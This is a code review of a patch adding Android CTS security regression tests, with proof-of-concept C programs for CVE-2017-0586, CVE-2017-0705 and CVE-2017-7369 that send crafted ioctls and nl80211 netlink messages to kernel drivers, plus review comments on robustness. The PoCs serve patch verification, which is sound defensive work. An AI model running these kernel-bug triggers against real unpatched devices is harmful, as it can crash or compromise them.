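Review bot: All three worker functions loop on `while(cout)` with `cout` never modified, so once /dev/touch_fwu opens, the parent and both children run until something external kills them. If the harness kills only the parent, the two children are left issuing ioctls against the driver. I would bound each loop, e.g. `for (i = 0; i < ITERATIONS; i++)` with ITERATIONS a constant chosen for the test (the name is a placeholder). I would also have the parent `kill()` and `waitpid()` both children before returning and close `fd` on exit from each function. The second `fork()` is not checked for failure, and `struct firmware` uses `uint8_t` without `<stdint.h>` being included directly, which may only compile through a transitive include.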
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0586/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0586/Android.mk
new file mode 100644
index 0000000..393bf6c
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0586/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0586
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0586/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0586/poc.c
new file mode 100644
index 0000000..6e57c93
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0586/poc.c
@@ -0,0 +1,94 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+
+#include <stdio.h>
+#include <string.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <fcntl.h>
+#include <errno.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+
+typedef int __bitwise snd_ctl_elem_iface_t;
+
+struct snd_ctl_elem_id {
+ unsigned int numid;
+ snd_ctl_elem_iface_t iface;
+ unsigned int device;
+ unsigned int subdevice;
+ unsigned char name[44];
+ unsigned int index;
+};
+
+struct snd_aes_iec958 {
+ unsigned char status[24];
+ unsigned char subcode[147];
+ unsigned char pad;
+ unsigned char dig_subframe[4];
+};
+
+struct snd_ctl_elem_value {
+ struct snd_ctl_elem_id id;
+ unsigned int indirect: 1;
+ union {
+ union {
+ long value[128];
+ long *value_ptr;
+ } integer;
+ union {
+ long long value[64];
+ long long *value_ptr;
+ } integer64;
+ union {
+ unsigned int item[128];
+ unsigned int *item_ptr;
+ } enumerated;
+ union {
+ unsigned char data[512];
+ unsigned char *data_ptr;
+ } bytes;
+ struct snd_aes_iec958 iec958;
+ } value;
+ struct timespec tstamp;
+ unsigned char reserved[128-sizeof(struct timespec)];
+};
+
+int main()
+{
+ int fd;
+ int ret;
+ void *map;
+ struct snd_ctl_elem_value arg;
+
+ fd = open("/dev/snd/controlC0", O_RDWR);
+ if(fd < 0){
+ return -1;
+ }
+
+ arg.id.numid = 148;
+ arg.value.enumerated.item[0] = 528;
+
+ ret = ioctl(fd,0xc4c85513,&arg);
+ if(ret < 0){
+ return -1;
+ }
+
+ return 0;
+}
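Review bot: `arg` is passed to the kernel with only `id.numid` and `value.enumerated.item[0]` set, so every other field of the request is stack garbage and the test input is not reproducible; add `memset(&arg, 0, sizeof(arg));` before the assignments. The request number `0xc4c85513` has the struct size baked in (0x4c8, which matches the 64-bit layout of this struct), so the 32-bit binary built from the same source most likely sends a request the driver does not recognise and the test silently does nothing there. Writing it as `_IOWR('U', 0x13, struct snd_ctl_elem_value)` lets the size follow the ABI and documents what the call is. `map` is unused and `fd` is never closed.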
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0705/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0705/Android.mk
new file mode 100644
index 0000000..bbde6e2
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0705/Android.mk
@@ -0,0 +1,36 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0705
+LOCAL_SRC_FILES := poc.c
+LOCAL_SHARED_LIBRARIES := libnl
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0705/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0705/poc.c
new file mode 100644
index 0000000..8d48434
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0705/poc.c
@@ -0,0 +1,257 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <errno.h>
+#include <unistd.h>
+#include <signal.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <linux/netlink.h>
+
+#include <netlink/netlink.h>
+#include <netlink/genl/genl.h>
+#include <netlink/genl/ctrl.h>
+#include <net/if.h>
+#include <linux/nl80211.h>
+
+#define OUI_GOOGLE 0x001A11
+#define ANDROID_NL80211_SUBCMD_RTT_RANGE_START 0x1100
+#define F1_32 0x41414141
+#define WL_CHANSPEC_BW_80 0x2000
+
+enum wl_vendor_subcmd {
+ BRCM_VENDOR_SCMD_UNSPEC,
+ BRCM_VENDOR_SCMD_PRIV_STR,
+ GSCAN_SUBCMD_GET_CAPABILITIES = 0x1000,
+ GSCAN_SUBCMD_SET_CONFIG,
+ GSCAN_SUBCMD_SET_SCAN_CONFIG,
+ GSCAN_SUBCMD_ENABLE_GSCAN,
+ GSCAN_SUBCMD_GET_SCAN_RESULTS,
+ GSCAN_SUBCMD_SCAN_RESULTS,
+ GSCAN_SUBCMD_SET_HOTLIST,
+ GSCAN_SUBCMD_SET_SIGNIFICANT_CHANGE_CONFIG,
+ GSCAN_SUBCMD_ENABLE_FULL_SCAN_RESULTS,
+ GSCAN_SUBCMD_GET_CHANNEL_LIST,
+ ANDR_WIFI_SUBCMD_GET_FEATURE_SET,
+ ANDR_WIFI_SUBCMD_GET_FEATURE_SET_MATRIX,
+ ANDR_WIFI_RANDOM_MAC_OUI,
+ ANDR_WIFI_NODFS_CHANNELS,
+ ANDR_WIFI_SET_COUNTRY,
+ GSCAN_SUBCMD_SET_EPNO_SSID,
+ WIFI_SUBCMD_SET_SSID_WHITELIST,
+ WIFI_SUBCMD_SET_LAZY_ROAM_PARAMS,
+ WIFI_SUBCMD_ENABLE_LAZY_ROAM,
+ WIFI_SUBCMD_SET_BSSID_PREF,
+ WIFI_SUBCMD_SET_BSSID_BLACKLIST,
+ GSCAN_SUBCMD_ANQPO_CONFIG,
+ WIFI_SUBCMD_SET_RSSI_MONITOR,
+ RTT_SUBCMD_SET_CONFIG = 0x1100,
+ RTT_SUBCMD_CANCEL_CONFIG,
+ RTT_SUBCMD_GETCAPABILITY,
+ LSTATS_SUBCMD_GET_INFO = 0x1200,
+ DEBUG_START_LOGGING = 0x1400,
+ DEBUG_TRIGGER_MEM_DUMP,
+ DEBUG_GET_MEM_DUMP,
+ DEBUG_GET_VER,
+ DEBUG_GET_RING_STATUS,
+ DEBUG_GET_RING_DATA,
+ DEBUG_GET_FEATURE,
+ DEBUG_RESET_LOGGING,
+ WIFI_OFFLOAD_SUBCMD_START_MKEEP_ALIVE = 0x1600,
+ WIFI_OFFLOAD_SUBCMD_STOP_MKEEP_ALIVE,
+ /* Add more sub commands here */
+ VENDOR_SUBCMD_MAX
+};
+
+enum debug_attributes {
+ DEBUG_ATTRIBUTE_GET_DRIVER,
+ DEBUG_ATTRIBUTE_GET_FW,
+ DEBUG_ATTRIBUTE_RING_ID,
+ DEBUG_ATTRIBUTE_RING_NAME,
+ DEBUG_ATTRIBUTE_RING_FLAGS,
+ DEBUG_ATTRIBUTE_LOG_LEVEL,
+ DEBUG_ATTRIBUTE_LOG_TIME_INTVAL,
+ DEBUG_ATTRIBUTE_LOG_MIN_DATA_SIZE,
+ DEBUG_ATTRIBUTE_FW_DUMP_LEN,
+ DEBUG_ATTRIBUTE_FW_DUMP_DATA,
+ DEBUG_ATTRIBUTE_RING_DATA,
+ DEBUG_ATTRIBUTE_RING_STATUS,
+ DEBUG_ATTRIBUTE_RING_NUM
+};
+
+
+enum gscan_attributes {
+ GSCAN_ATTRIBUTE_NUM_BUCKETS = 10,
+ GSCAN_ATTRIBUTE_BASE_PERIOD,
+ GSCAN_ATTRIBUTE_BUCKETS_BAND,
+ GSCAN_ATTRIBUTE_BUCKET_ID,
+ GSCAN_ATTRIBUTE_BUCKET_PERIOD,
+ GSCAN_ATTRIBUTE_BUCKET_NUM_CHANNELS,
+ GSCAN_ATTRIBUTE_BUCKET_CHANNELS,
+ GSCAN_ATTRIBUTE_NUM_AP_PER_SCAN,
+ GSCAN_ATTRIBUTE_REPORT_THRESHOLD,
+ GSCAN_ATTRIBUTE_NUM_SCANS_TO_CACHE,
+ GSCAN_ATTRIBUTE_BAND = GSCAN_ATTRIBUTE_BUCKETS_BAND,
+ GSCAN_ATTRIBUTE_ENABLE_FEATURE = 20,
+ GSCAN_ATTRIBUTE_SCAN_RESULTS_COMPLETE,
+ GSCAN_ATTRIBUTE_FLUSH_FEATURE,
+ GSCAN_ATTRIBUTE_ENABLE_FULL_SCAN_RESULTS,
+ GSCAN_ATTRIBUTE_REPORT_EVENTS,
+ /* remaining reserved for additional attributes */
+ GSCAN_ATTRIBUTE_NUM_OF_RESULTS = 30,
+ GSCAN_ATTRIBUTE_FLUSH_RESULTS,
+ GSCAN_ATTRIBUTE_SCAN_RESULTS, /* flat array of wifi_scan_result */
+ GSCAN_ATTRIBUTE_SCAN_ID, /* indicates scan number */
+ GSCAN_ATTRIBUTE_SCAN_FLAGS, /* indicates if scan was aborted */
+ GSCAN_ATTRIBUTE_AP_FLAGS, /* flags on significant change event */
+ GSCAN_ATTRIBUTE_NUM_CHANNELS,
+ GSCAN_ATTRIBUTE_CHANNEL_LIST,
+ /* remaining reserved for additional attributes */
+ GSCAN_ATTRIBUTE_SSID = 40,
+ GSCAN_ATTRIBUTE_BSSID,
+ GSCAN_ATTRIBUTE_CHANNEL,
+ GSCAN_ATTRIBUTE_RSSI,
+ GSCAN_ATTRIBUTE_TIMESTAMP,
+ GSCAN_ATTRIBUTE_RTT,
+ GSCAN_ATTRIBUTE_RTTSD,
+ /* remaining reserved for additional attributes */
+ GSCAN_ATTRIBUTE_HOTLIST_BSSIDS = 50,
+ GSCAN_ATTRIBUTE_RSSI_LOW,
+ GSCAN_ATTRIBUTE_RSSI_HIGH,
+ GSCAN_ATTRIBUTE_HOSTLIST_BSSID_ELEM,
+ GSCAN_ATTRIBUTE_HOTLIST_FLUSH,
+ /* remaining reserved for additional attributes */
+ GSCAN_ATTRIBUTE_RSSI_SAMPLE_SIZE = 60,
+ GSCAN_ATTRIBUTE_LOST_AP_SAMPLE_SIZE,
+ GSCAN_ATTRIBUTE_MIN_BREACHING,
+ GSCAN_ATTRIBUTE_SIGNIFICANT_CHANGE_BSSIDS,
+ GSCAN_ATTRIBUTE_SIGNIFICANT_CHANGE_FLUSH,
+ /* EPNO */
+ GSCAN_ATTRIBUTE_EPNO_SSID_LIST = 70,
+ GSCAN_ATTRIBUTE_EPNO_SSID,
+ GSCAN_ATTRIBUTE_EPNO_SSID_LEN,
+ GSCAN_ATTRIBUTE_EPNO_RSSI,
+ GSCAN_ATTRIBUTE_EPNO_FLAGS,
+ GSCAN_ATTRIBUTE_EPNO_AUTH,
+ GSCAN_ATTRIBUTE_EPNO_SSID_NUM,
+ GSCAN_ATTRIBUTE_EPNO_FLUSH,
+ /* Roam SSID Whitelist and BSSID pref */
+ GSCAN_ATTRIBUTE_WHITELIST_SSID = 80,
+ GSCAN_ATTRIBUTE_NUM_WL_SSID,
+ GSCAN_ATTRIBUTE_WL_SSID_LEN,
+ GSCAN_ATTRIBUTE_WL_SSID_FLUSH,
+ GSCAN_ATTRIBUTE_WHITELIST_SSID_ELEM,
+ GSCAN_ATTRIBUTE_NUM_BSSID,
+ GSCAN_ATTRIBUTE_BSSID_PREF_LIST,
+ GSCAN_ATTRIBUTE_BSSID_PREF_FLUSH,
+ GSCAN_ATTRIBUTE_BSSID_PREF,
+ GSCAN_ATTRIBUTE_RSSI_MODIFIER,
+ /* Roam cfg */
+ GSCAN_ATTRIBUTE_A_BAND_BOOST_THRESHOLD = 90,
+ GSCAN_ATTRIBUTE_A_BAND_PENALTY_THRESHOLD,
+ GSCAN_ATTRIBUTE_A_BAND_BOOST_FACTOR,
+ GSCAN_ATTRIBUTE_A_BAND_PENALTY_FACTOR,
+ GSCAN_ATTRIBUTE_A_BAND_MAX_BOOST,
+ GSCAN_ATTRIBUTE_LAZY_ROAM_HYSTERESIS,
+ GSCAN_ATTRIBUTE_ALERT_ROAM_RSSI_TRIGGER,
+ GSCAN_ATTRIBUTE_LAZY_ROAM_ENABLE,
+ /* BSSID blacklist */
+ GSCAN_ATTRIBUTE_BSSID_BLACKLIST_FLUSH = 100,
+ GSCAN_ATTRIBUTE_BLACKLIST_BSSID,
+ GSCAN_ATTRIBUTE_ANQPO_HS_LIST = 110,
+ GSCAN_ATTRIBUTE_ANQPO_HS_LIST_SIZE,
+ GSCAN_ATTRIBUTE_ANQPO_HS_NETWORK_ID,
+ GSCAN_ATTRIBUTE_ANQPO_HS_NAI_REALM,
+ GSCAN_ATTRIBUTE_ANQPO_HS_ROAM_CONSORTIUM_ID,
+ GSCAN_ATTRIBUTE_ANQPO_HS_PLMN,
+ /* Adaptive scan attributes */
+ GSCAN_ATTRIBUTE_BUCKET_STEP_COUNT = 120,
+ GSCAN_ATTRIBUTE_BUCKET_MAX_PERIOD,
+ GSCAN_ATTRIBUTE_MAX
+};
+
+
+#define ETHER_ADDR_LEN 6
+struct __attribute__ ((packed)) _ether_addr {
+ uint8_t octet[ETHER_ADDR_LEN];
+};
+
+static int l1;
+static int l2;
+static void test(struct nl_sock *socket, int d_id, int if_index)
+{
+ struct nl_msg *msg;
+ struct nl_cb *cb;
+ struct nl_msg *vendor_cmd, *nested_msg;
+ struct nlattr *nl_vendor_cmds, *nested, *nested2, *nested3;
+ int err, i, j = 0, k = 0, ret;
+ struct _ether_addr mac;
+ memset(&mac, 0x41, sizeof(mac));
+
+ // Allocate the messages and callback handler.
+ for (j = l1; j < 1024; j++) {
+ for(k = l2; k < 128; k++) {
+ msg = nlmsg_alloc_size(16384);
+ if (!msg) {
+ exit(EXIT_FAILURE);
+ }
+
+ genlmsg_put(msg, 0, 0, d_id, 0, 0, NL80211_CMD_VENDOR, 0);
+ nla_put_u32(msg, NL80211_ATTR_IFINDEX, if_index);
+ nla_put_u32(msg, NL80211_ATTR_WIPHY, 0);
+ nla_put_u64(msg, NL80211_ATTR_WDEV, 1);
+ nla_put_u32(msg, NL80211_ATTR_VENDOR_ID, OUI_GOOGLE);
+ nla_put_u32(msg, NL80211_ATTR_VENDOR_SUBCMD, GSCAN_SUBCMD_SET_SIGNIFICANT_CHANGE_CONFIG);
+
+ /* construct the vendor cmd */
+ nl_vendor_cmds = nla_nest_start(msg, NL80211_ATTR_VENDOR_DATA);
+
+ nested = nla_nest_start(msg, GSCAN_ATTRIBUTE_SIGNIFICANT_CHANGE_BSSIDS);
+ for (i = 0; i < j; i++) {
+ nested2 = nla_nest_start(msg, i);
+ nla_nest_end(msg, nested2);
+ }
+ for (i = 0; i < k; i++) {
+ nested2 = nla_nest_start(msg, i);
+ nla_put(msg, GSCAN_ATTRIBUTE_BSSID, sizeof(mac), &mac);
+ nla_put_u8(msg, GSCAN_ATTRIBUTE_RSSI_LOW, 0x41);
+ nla_put_u8(msg, GSCAN_ATTRIBUTE_RSSI_HIGH, 0x41);
+ nla_nest_end(msg, nested2);
+ }
+ nla_nest_end(msg, nested);
+ nla_nest_end(msg, nl_vendor_cmds);
+
+ nl_send_auto_complete(socket, msg);
+ nlmsg_free(msg);
+ }
+ }
+}
+
+int main(int argc, char **argv)
+{
+ int if_index = if_nametoindex("wlan0"); // Use this wireless interface for scanning.
+ l1 = 157;
+ l2 = 0;
+ // Open socket to kernel.
+ struct nl_sock *socket = nl_socket_alloc(); // Allocate new netlink socket in memory.
+ genl_connect(socket); // Create file descriptor and bind socket.
+ int driver_id = genl_ctrl_resolve(socket, "nl80211"); // Find the nl80211 driver ID.
+
+ test(socket, driver_id, if_index);
+}
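Review bot: main uses the results of `if_nametoindex`, `nl_socket_alloc`, `genl_connect` and `genl_ctrl_resolve` without checking any of them. On a device with no wlan0 or no nl80211 family, test() is therefore driven with interface index 0, a negative family id or a NULL socket, and may crash in user space rather than report that the target is absent. The socket is also never released, and main has no explicit return value. The fence shows the checks I would add; the exit status for the "not applicable" case should be whatever the host-side test expects, which is not visible in this hunk. Inside test(), the return values of the `nla_put*` and `nla_nest_start` calls are ignored as well, and `cb`, `vendor_cmd`, `nested_msg`, `nested3`, `err` and `ret` are unused.

```c
int main(int argc, char **argv)
{
    int if_index = if_nametoindex("wlan0");
    if (if_index == 0) {
        return EXIT_FAILURE; /* interface not present on this device */
    }
    /* … unchanged: l1 / l2 initialisation … */
    struct nl_sock *socket = nl_socket_alloc();
    if (!socket) {
        return EXIT_FAILURE;
    }
    if (genl_connect(socket) < 0) {
        nl_socket_free(socket);
        return EXIT_FAILURE;
    }
    int driver_id = genl_ctrl_resolve(socket, "nl80211");
    if (driver_id < 0) {
        nl_socket_free(socket);
        return EXIT_FAILURE;
    }

    test(socket, driver_id, if_index);
    nl_socket_free(socket);
    return EXIT_SUCCESS;
}
```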
diff --git a/hostsidetests/security/securityPatch/CVE-2017-7369/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-7369/Android.mk
new file mode 100644
index 0000000..9d1d3d17
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-7369/Android.mk
@@ -0,0 +1,36 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-7369
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+LOCAL_SRC_FILES := poc.c
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-7369/poc.c b/hostsidetests/security/securityPatch/CVE-2017-7369/poc.c
new file mode 100644
index 0000000..c18936c
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-7369/poc.c
@@ -0,0 +1,236 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#define _GNU_SOURCE
+
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/ioctl.h>
+#include <sys/ptrace.h>
+#include <errno.h>
+#include <sys/syscall.h>
+#include <sys/prctl.h>
+#include <stdint.h>
+#include <sys/stat.h>
+#include <sys/mman.h>
+#include <linux/fb.h>
+#include <dlfcn.h>
+#include <sys/socket.h>
+#include <fcntl.h>
+#include <signal.h>
+#include <unistd.h>
+#include <sound/asound.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+
+#define MAXNUM 94
+#define MAXPCMOP 25
+#define MAXELE 16384
+
+char* CONTBL[MAXNUM]={
+ "comprC0D17",
+ "comprC0D18",
+ "comprC0D37",
+ "comprC0D38",
+ "comprC0D39",
+ "comprC0D40",
+ "comprC0D41",
+ "comprC0D42",
+ "comprC0D9",
+ "controlC0",
+ "hwC0D10",
+ "hwC0D1000",
+ "hwC0D11",
+ "hwC0D12",
+ "hwC0D13",
+ "hwC0D14",
+ "hwC0D15",
+ "hwC0D16",
+ "hwC0D2",
+ "hwC0D20",
+ "hwC0D21",
+ "hwC0D22",
+ "hwC0D24",
+ "hwC0D25",
+ "hwC0D26",
+ "hwC0D3",
+ "hwC0D30",
+ "hwC0D31",
+ "hwC0D35",
+ "hwC0D36",
+ "hwC0D37",
+ "hwC0D39",
+ "hwC0D40",
+ "hwC0D45",
+ "hwC0D7",
+ "hwC0D8",
+ "hwC0D9",
+ "pcmC0D0c",
+ "pcmC0D0p",
+ "pcmC0D10c",
+ "pcmC0D10p",
+ "pcmC0D11c",
+ "pcmC0D11p",
+ "pcmC0D12c",
+ "pcmC0D12p",
+ "pcmC0D13c",
+ "pcmC0D13p",
+ "pcmC0D14c",
+ "pcmC0D14p",
+ "pcmC0D15c",
+ "pcmC0D15p",
+ "pcmC0D16c",
+ "pcmC0D19c",
+ "pcmC0D19p",
+ "pcmC0D1c",
+ "pcmC0D1p",
+ "pcmC0D20c",
+ "pcmC0D20p",
+ "pcmC0D21p",
+ "pcmC0D22c",
+ "pcmC0D22p",
+ "pcmC0D23c",
+ "pcmC0D23p",
+ "pcmC0D24c",
+ "pcmC0D24p",
+ "pcmC0D25c",
+ "pcmC0D26p",
+ "pcmC0D27c",
+ "pcmC0D28c",
+ "pcmC0D29c",
+ "pcmC0D2c",
+ "pcmC0D2p",
+ "pcmC0D30c",
+ "pcmC0D31c",
+ "pcmC0D32c",
+ "pcmC0D33c",
+ "pcmC0D34c",
+ "pcmC0D35c",
+ "pcmC0D35p",
+ "pcmC0D36c",
+ "pcmC0D36p",
+ "pcmC0D3c",
+ "pcmC0D3p",
+ "pcmC0D43c",
+ "pcmC0D44c",
+ "pcmC0D44p",
+ "pcmC0D45c",
+ "pcmC0D45p",
+ "pcmC0D4p",
+ "pcmC0D5c",
+ "pcmC0D5p",
+ "pcmC0D6c",
+ "pcmC0D7p",
+ "pcmC0D8c"
+};
+
+ char* OPPCM[MAXPCMOP]={
+ "/dev/snd/pcmC0D0p",
+ "/dev/snd/pcmC0D10p",
+ "/dev/snd/pcmC0D11p",
+ "/dev/snd/pcmC0D12p",
+ "/dev/snd/pcmC0D13p",
+ "/dev/snd/pcmC0D14p",
+ "/dev/snd/pcmC0D15p",
+ "/dev/snd/pcmC0D19p",
+ "/dev/snd/pcmC0D1p",
+ "/dev/snd/pcmC0D20p",
+ "/dev/snd/pcmC0D21p",
+ "/dev/snd/pcmC0D22p",
+ "/dev/snd/pcmC0D23p",
+ "/dev/snd/pcmC0D24p",
+ "/dev/snd/pcmC0D2p",
+ "/dev/snd/pcmC0D32p",
+ "/dev/snd/pcmC0D33p",
+ "/dev/snd/pcmC0D3p",
+ "/dev/snd/pcmC0D40p",
+ "/dev/snd/pcmC0D41p",
+ "/dev/snd/pcmC0D44p",
+ "/dev/snd/pcmC0D47p",
+ "/dev/snd/pcmC0D4p",
+ "/dev/snd/pcmC0D5p",
+ "/dev/snd/pcmC0D7p"
+};
+
+void poc(char* name)
+{
+ int fd, ret, cmd, index,pcmfd, i;
+ char dev[36]={0};
+ snprintf(dev, sizeof(dev),"/dev/snd/%s", name);
+ fd = open(dev, O_RDWR);
+ if (fd < 0)
+ {
+ return;
+ }
+
+ cmd = SNDRV_CTL_IOCTL_CARD_INFO;
+ struct snd_ctl_card_info info;
+ ret = ioctl(fd, cmd, &info);
+
+ struct snd_ctl_elem_list lst;
+ struct snd_ctl_elem_value control;
+ memset(&lst, 0, sizeof(lst));
+ lst.pids = calloc(MAXELE, sizeof(struct snd_ctl_elem_list));
+ lst.space = MAXELE;
+ cmd = SNDRV_CTL_IOCTL_ELEM_LIST;
+ ret = ioctl(fd, cmd, &lst);
+ control.value.integer.value[0]=control.value.enumerated.item[0] = 0x80001111;
+
+ for(index=0;(unsigned int)index<lst.count;index++)
+ {
+ if(!strncmp((const char *)lst.pids[index].name,"SLIM_1_TX Channels",18)||
+ !strncmp((const char *)lst.pids[index].name,"SLIM_0_TX Channels",18)||
+ !strncmp((const char *)lst.pids[index].name,"SLIM_6_RX Channels",18)||
+ !strncmp((const char *)lst.pids[index].name,"SLIM_5_RX Channels",18)||
+ !strncmp((const char *)lst.pids[index].name,"SLIM_0_RX Channels",18)||
+ !strncmp((const char *)lst.pids[index].name,"Playback 24 Volume",18)||
+ !strncmp((const char *)lst.pids[index].name,"left Profile",12)||
+ !strncmp((const char *)lst.pids[index].name,"Playback Device Channel Map",27)||
+ !strncmp((const char *)lst.pids[index].name, "LSM",3)||
+ !strncmp((const char *)lst.pids[index].name,"MAD Input",9)||
+ !strncmp((const char *)lst.pids[index].name, "AUDIO_REF_EC_UL",15)||
+ !strncmp((const char *)lst.pids[index].name, "VOC_EXT_EC",10)) continue;
+
+ control.id.numid=lst.pids[index].numid;
+ ret = ioctl(fd,SNDRV_CTL_IOCTL_ELEM_WRITE,&control);
+ }
+ close(fd);
+}
+
+struct mystruct{
+ int a;
+ char* pp;
+};
+
+void freeptr(struct mystruct* p)
+{
+ unsigned char* n = (unsigned char *)p->pp;
+ n = NULL;
+ p->pp = NULL;
+ p = NULL;
+}
+
+int main()
+{
+ int i =0;
+ for(i = 0; i< MAXNUM; i++)
+ {
+ poc("controlC0");
+ break;
+ }
+ return 1;
+}
